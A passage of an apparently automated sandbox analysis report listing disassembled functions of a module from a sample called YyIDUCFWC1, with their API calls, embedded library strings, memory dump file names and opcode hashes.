                                                                                                                                                                                                                                              • GetLastError.KERNEL32(0000000A,?,00000000), ref: 6CF38F8F
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF39014
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Timer: QueryPerformanceCounter failed with error , xrefs: 6CF38FA5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: Timer: QueryPerformanceCounter failed with error
                                                                                                                                                                                                                                              • API String ID: 1823523280-4075696077
                                                                                                                                                                                                                                              • Opcode ID: 380dcbb428a456fbcbe60f2b7156d93ac290a186064c6a26812d06dae383b27f
                                                                                                                                                                                                                                              • Instruction ID: f6f8c86f34b9f89591601d94944ae1d63677623344a9e8f2aaec4f41b13b02e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 380dcbb428a456fbcbe60f2b7156d93ac290a186064c6a26812d06dae383b27f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9211DB1508380AFD350CF24C841B9BBBE4FB99654F508E1DF5A987781DB7595088BA3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF06480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF06518
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF06558
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CF064E7
                                                                                                                                                                                                                                              • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CF06527
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                              • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                                                                                                                                                                              • API String ID: 3476068407-3345525433
                                                                                                                                                                                                                                              • Opcode ID: 3a3c756995986a5f6768ab1ea40bdfe1c35f8369ed8204e09df9505a1caebe91
                                                                                                                                                                                                                                              • Instruction ID: 899e84aaf6fe226c14a18a5d78bc8771ebc8fae0a22c7a59377c152015b108a1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a3c756995986a5f6768ab1ea40bdfe1c35f8369ed8204e09df9505a1caebe91
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21C371618390AED724CB64C850FDAB3F4AF49A58F504A1DF98982A44EB36A44D8A63
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF0C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF0C14E
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: gfff$gfff$vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 1823113695-3369487235
                                                                                                                                                                                                                                              • Opcode ID: 52b8dbcfc03764a7f13af5b3eaf9483ae1705c9c690383ace835d166569e7c0a
                                                                                                                                                                                                                                              • Instruction ID: e529dc9bcda9bf67c72201fa730e4feb53cacebb826621adb95f4b10bfc6a204
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52b8dbcfc03764a7f13af5b3eaf9483ae1705c9c690383ace835d166569e7c0a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6601D673F040255F8310993FED4044AE68797C4795319CA36D508DBB59D531DC0253D2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF125D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove$Exception@8Throw
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2655171816-0
                                                                                                                                                                                                                                              • Opcode ID: 732a766ba532860a494917d733542e6d0f4c05f3005fe0a7a192feeba4f32096
                                                                                                                                                                                                                                              • Instruction ID: d1ee44f8110ef8dbd0c77593472ef32ab0ba7b08779d8fb2fcd149a3e525e861
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 732a766ba532860a494917d733542e6d0f4c05f3005fe0a7a192feeba4f32096
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D451B0753087058FD704DFA9CD94A1FB3E9AFC9604F10492CE495C3B80EB36E9098B92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEED4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEED5E4
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEED5F9
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEED608
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEED61D
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2621100827-0
                                                                                                                                                                                                                                              • Opcode ID: e11d2cabe5ba517759c467a0547193bce887dd2da1a6be9142fb821c7dc204a2
                                                                                                                                                                                                                                              • Instruction ID: c26ced8ed96d020f286064c9abe50c9eaaf876b6c94182aa597d67e246157e79
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e11d2cabe5ba517759c467a0547193bce887dd2da1a6be9142fb821c7dc204a2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52514BB1A00649EFCB44CFA8C980A99FBF4FB48308F54866ED419D7B41D771EA54CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF5F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEF6035
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEF604A
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEF6059
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEF606E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2621100827-0
                                                                                                                                                                                                                                              • Opcode ID: 4d84265b0fe9269b191d31be3512f9e4cefa5af2eeef31087e452429d07d35e5
                                                                                                                                                                                                                                              • Instruction ID: 23432c382bd28cc4921ce3f1f294a58c420998e572239f2a2fc65c5ccd7ef7b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d84265b0fe9269b191d31be3512f9e4cefa5af2eeef31087e452429d07d35e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6516EB1A01649AFC744CFA8C880A89FBF4FF08304F60866ED519D7B41D771EA54CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEDE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$Init
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3740757921-0
                                                                                                                                                                                                                                              • Opcode ID: 9aacdd40a448a8b4a1071edd39606c2b76d6b0c196a1e8c4d0bd7985105c3233
                                                                                                                                                                                                                                              • Instruction ID: 01b0a8972b0346baaac69c6931ef8fd42b7adee92b68c5f67682c9345db5f201
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9aacdd40a448a8b4a1071edd39606c2b76d6b0c196a1e8c4d0bd7985105c3233
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD4179366082419FD700DF29C840B5AB7F8FFDA754F148A69F9449B760D731E905CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF5DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEF5E87
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEF5E9C
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEF5EAB
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEF5EC0
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2621100827-0
                                                                                                                                                                                                                                              • Opcode ID: a12456a8029a88298044b79ebf15e7d86221c9385c0d89d18468d34655365490
                                                                                                                                                                                                                                              • Instruction ID: 0c11fbbf566e3891056edf46d4c32c11ca9ae1335d6665b7324de5ec9dd04873
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a12456a8029a88298044b79ebf15e7d86221c9385c0d89d18468d34655365490
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C416DB19017589FC720CFA9C880A8AFBF4FF18304F50896ED85A97B41D771E608CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEED360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEED437
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEED44C
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEED45B
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEED470
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2621100827-0
                                                                                                                                                                                                                                              • Opcode ID: df19d6eabcf8ae064b57a8fe30d7551cf097f342ef39cfb52e61efb2663e9eb6
                                                                                                                                                                                                                                              • Instruction ID: ec823b1f4e62c472f0c9063f47f483453706391f7c0b096dc3dd0c6abcba778b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df19d6eabcf8ae064b57a8fe30d7551cf097f342ef39cfb52e61efb2663e9eb6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 644129B19007589FC720CFA9D880A8ABBF4FB19304F54896ED95A97B41D771E608CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF32B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF06480: __CxxThrowException@8.LIBCMT ref: 6CF06518
                                                                                                                                                                                                                                                • Part of subcall function 6CF06480: __CxxThrowException@8.LIBCMT ref: 6CF06558
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF32C9A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF32CB1
